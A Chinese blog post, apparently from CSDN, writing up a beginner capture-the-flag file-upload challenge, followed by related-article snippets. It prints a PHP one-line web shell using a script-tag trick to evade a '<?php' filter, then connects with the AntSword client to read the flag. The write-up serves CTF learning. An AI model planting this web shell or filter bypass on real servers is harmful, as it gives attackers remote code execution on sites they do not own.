CTF日记之web题目(入门题目)

最新推荐文章于 2023-11-15 20:20:56 发布
最新推荐文章于 2023-11-15 20:20:56 发布
阅读量185 收藏
点赞数
分类专栏: php ctf 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunleibaba/article/details/113002203
版权
ctf 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
php
8 篇文章 0 订阅
订阅专栏

CTF日记:百度杯”CTF比赛 九月场 Upload

在这里插入图片描述

打开题目,发现是一道上传题:
在这里插入图片描述
我们上传了一句话木马的php文件,发现了上传的路径
在这里插入图片描述
然后查看2.php文件,发现开头的“<?php”被过滤了。

在这里插入图片描述
那我们就换个一句话木马。
<script language="pHp">@eval($_POST['123'])</script>,这样 ?和php就都被绕过了,再次上传试试看。

用中国蚁剑连接试试看,发现成功了!

在这里插入图片描述

找到flag.php,打开就得到了flag。

在这里插入图片描述

二哈它爸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTFWeb方向练习题)(持续更新)
m0_56010012的博客
02-23 4888
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
CTF-Web基础题
weixin_52182264的博客
04-21 6321
CTF-Web基础题
Web渗透测试----3、文件上传漏洞
七天
12-23 2880
文章目录一、文件上传漏洞二、客户端校验上传文件的方式及绕过2.1、客户端JS验证2.2.1、前端js验证代码2.2.2、绕过前端JS验证三、服务端校验文件上传的方式及绕过3.1、通过文件后缀验证及绕过3.2 、通过文件类型验证及绕过3.3 、通过文件内容验证及绕过3.4、WAF进行校验及绕过3.5、竞争上传绕过3.6、.htaccess文件绕过3.7、根据操作系统特性进行绕过3.8、通过post和get方法绕过3.9、通过文件截断绕过攻击3.10、利用文件包含或解析漏洞绕过上传四、文件上传漏洞的防御总结 .
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 3万+
个人向CTF Web题思路总结笔记
CTF_WEB(习题)
若比邻的博客
12-15 4952
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
CTF web安全经典例题讲解
10-22
该内容为CTF赛题web安全经理例题讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种题型讲解,图文结合,适合新手学习。
【心得】PHP的代码执行个人笔记
最新发布
uuzeray的博客
11-15 302
(摘要)Code指脚本语言(php)的代码eval总结:eval(字符串) 表示将字符串按照php的代码执行php动态函数调用命令执行和代码执行的区别前者执行操作系统命令 或者执行 脚本语言的代码函数返回值 函数名字(函数参数);1 危险函数利用2 过滤了黑名单如果仅仅在代码中过滤了函数名称,那么大概率就等于 没过滤??`$_GET[2]`;无回显情况下的命令执行通道数据传输的路径shell_execsystem 相比,没有回显结果。
CTF】buuctf web (四)——通过配置文件构造PHP后门
m0_52923241的博客
08-19 1501
知识点 user.ini文件构成的PHP后门 .user.ini文件 它比.htaccess(分布式配置文件)用的更广,不管是nginx/apache/IIS,只要是以fastcgi(进程管理器)运行的php都可以用这个方法。 [SUCTF 2019]CheckIn 上传一个a.php文件,文件内容为<?php phpinfo();?> 提示非法后缀,将后缀php修改为jpg 提示<?被过滤了 将内容变为脚本标记格式:<script language=php> phpi
wmm的学习日记(文件上传漏洞)
swmmbswzy的博客
11-25 1271
关于CTFweb方向里的文件上传漏洞的简单介绍学习
web刷题记录,查询使用
devil8123665的博客
10-28 2180
1、[RoarCTF 2019]Easy Calchttps://buuoj.cn wp:https://blog.csdn.net/mochu7777777/article/details/109169796 注意点: 使用scandir()函数+chr()函数绕过代码执行 /calc.php?%20num=var_dump(scandir(chr(47))) 或者使用glob()函数 /calc.php?%20num=var_dump(glob(chr(47).chr(42))..
CTF学习-web解题思路
菜鸟-传奇
08-27 8299
CTF学习-web题思路 持续更新 基础篇 1.直接查看源代码 2.修改或添加HTTP请求头 常见的有: Referer来源伪造 X-Forwarded-For:ip伪造 User-Agent:用户代理(就是用什么浏览器什么的) //.net的版本修改,后面添加,如版本9 .NET CLR 9 Accept-Language:语言 Cookie的修改 3.查看HTTP请求头或响应头...
记一次院赛CTFWEB题(入门级别)
CTF小白的博客
04-14 2万+
目录签到一签到二口算小天才easy php录取查询我爱pythonSpring 这次院赛的题目比较基础,适合给刚入门CTF的小白提供一个大致CTF解题思路。(主要因为本人小白,表示能学到不少东西。) 签到一 题目中直接给了flag,提交就可以了。 签到二 这题主要考察的是基本的F12能力,查看网页源码,以及修改input输入框的长度。 口算小天才 这题通过题意,是需要让我们在1~3秒内回答...
CTFweb题库笔记(难度4)
cocoaiu的博客
08-13 5237
CTFweb题库笔记(41-50)
CTFWeb题目的各种基础的思路-----入门篇十分的详细
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
ctf 安卓 入门题目
11-02
CTF(Capture The Flag)安卓入门题目是为了帮助初学者理解和学习安卓应用程序的安全漏洞和攻防技术而设计的一系列题目。这些题目往往包含了一些常见的安卓漏洞,例如代码注入、权限绕过、数据泄露等等。 解决CTF安卓入门题目的过程中,参与者需要充分理解如何利用安卓应用程序的漏洞来实现攻击,同时也要学会通过相应的防御措施来保护应用程序的安全。 具体来说,一般来说CTF安卓入门题目可能包括以下内容: 1. 反编译应用程序:参与者需要使用相应的工具将安卓应用程序反编译为可读的代码,以便进行后续的分析和修改。 2. 漏洞分析:通过分析源代码或者逆向工程技术,参与者需要找出应用程序中存在的潜在漏洞,并尝试利用这些漏洞完成相应的攻击。 3. 攻击实现:一旦找到了安卓应用程序的漏洞,参与者需要根据漏洞的类型和具体情况,编写相应的代码来实现攻击。 4. 防御机制:除了攻击,参与者还需要思考如何通过加强应用程序的安全措施来防止这些攻击。这可能包括权限管理、数据加密、输入验证等等。 总之,CTF安卓入门题目是为初学者提供一个实战的场景,让他们通过解决漏洞和实施攻防来提升对安卓安全的理解和技能。同时,参与者还可以通过与其他人的交流和分享,进一步扩展自己的知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

二哈它爸

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值